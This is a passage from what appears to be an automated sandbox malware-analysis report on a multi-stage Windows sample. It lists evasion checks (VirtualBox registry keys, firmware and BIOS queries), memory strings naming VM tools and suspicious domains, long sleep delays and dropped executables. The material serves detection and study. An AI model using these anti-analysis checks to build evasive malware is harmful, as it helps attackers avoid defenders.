Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u69w.1.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u69w.1.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u69w.1.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe System information queried: FirmwareTableInformation
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe System information queried: FirmwareTableInformation
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe System information queried: FirmwareTableInformation
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe System information queried: FirmwareTableInformation
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmp Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmp Binary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmp Binary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTART TASK: %WSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe Special instruction interceptor: First address: CE3339 instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\file.exe Memory allocated: 27F37A40000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\file.exe Memory allocated: 27F39070000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\file.exe Memory allocated: 27F59070000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: DB0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 2850000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 4850000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 7070000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 6500000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 83B0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 93B0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 96D0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: B6D0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: E6D0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: F250000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 15210000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 16210000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 1AAC0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 1BAC0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 22AC0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 23840000 memory reserve | memory write watch
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 600000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 599875
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 300000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 599766
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 599653
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 599547
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 599438
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 599328
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 599219
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 599108
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 598998
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 598891
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 598781
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 598672
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 598558
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 598451
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 598341
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 598216
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 598075
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 597963
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 597833
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 597687
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 597578
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 597468
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 597359
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 597250
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 597140
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 597031
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 596919
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 596811
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 596676
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 596562
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 596453
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 596343
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 596231
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 596125
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 596015
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 595771
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 595640
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 595530
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Thread delayed: delay time: 300000
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 6134
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 3641
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1066
                        Source: C:\Users\user\AppData\Local\Temp\u4dc.0.exe Window / User API: threadDelayed 381
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\bw9CU3SIyrt3JEs5ELMi3GM3.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\0bDSNbGYZjXnI1v06off3DYe.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\Pictures\2pjOwxxUjFNOdrkI94TdGraH.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\NpXiURSjfclxWgcUlkMD5eJ8.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\Pictures\0Flev5sTDyJ3duKpLfv5ka2Z.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\Retailer_prog[1].exe
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2404231937382151588.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\Pictures\NDdJEWHR1zXBL7ACRBN1bJsT.exe
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\Opera_109.0.5097.59_Autoupdate_x64[4].exe
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\mozglue[1].dll
